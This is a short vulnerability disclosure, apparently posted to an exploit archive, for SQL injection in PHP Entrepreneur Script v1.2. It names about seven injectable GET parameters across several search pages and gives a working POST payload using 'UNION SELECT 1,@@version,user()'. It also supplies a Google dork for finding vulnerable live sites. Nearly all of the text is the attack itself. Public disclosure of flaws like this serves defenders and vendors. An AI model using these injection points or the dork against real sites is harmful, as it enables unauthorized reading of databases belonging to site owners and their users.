PHP Entrepreneur script version 1.2 suffers from a remote SQL injection vulnerability.
ddfe2ee84fd9b4ef6582fae4efe60afc
################################################
#Title: PHP Entrepreneur Script v1.2 - SQL Injection
#Credit: Bilal KARDADOU
#Vendor: www.jobportalscript.com
#Vendor URL: http://www.jobportalscript.com/entrepreneur-home-basic-
version.html
#Product: PHP Entrepreneur Script.
# Entrepreneur Script Feature Document : http://www.jobportalscript.
com/documents/entrepreneur.docx
#Google Dork: new_searchresult.php?left_cat=13 - ...
#
################################################
#
# --SQL Injection/Exploit--
# www.localhost/new_searchresult.php?left_cat=5[SQL]
# www.localhost/farea_search_result.php?fid=13[SQL]
# www.localhost/categ_search_result.php?industry_type=17[SQL]
# www.localhost/exam_question.php?cate_id=19[SQL]
# www.localhost/categ_search_result.php?action=slogin&
industry_type=8[SQL]&jid_0=31320142800&jid_1=31408427830&save_job=Save+Jobs
# www.localhost/farea_search_result.php?action=slogin&fid=
31[SQL]&jid_0=31469880989&jid_1=31454064191&jid_2=
31453804816&jid_4=31441601731&jid_5=31439299432&jid_6=
31413109189&jid_7=31412079908&save_job=Save+Jobs
# www.localhost/quick_result.php?Search&search_type=[SQL]
#
# [POST Method]
www.localhost/adv_searchresult.php
keyword=woot&from_exp=0&to_exp=0&location=Morocco' UNION SELECT
1,@@version,user(),4,5,6,7,8-- -&area=1&submit=Search
# ---PoC---
# http://prnt.sc/ehg2tz
# http://prnt.sc/ehg386
# http://prnt.sc/ehg3dm
# http://prnt.sc/ehg3k8
# http://prnt.sc/ehg197
#
# Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127)
################################################
--
*Bilal Kardadou*
IT Security Consultant
*E* : [email protected] | *E* : [email protected] |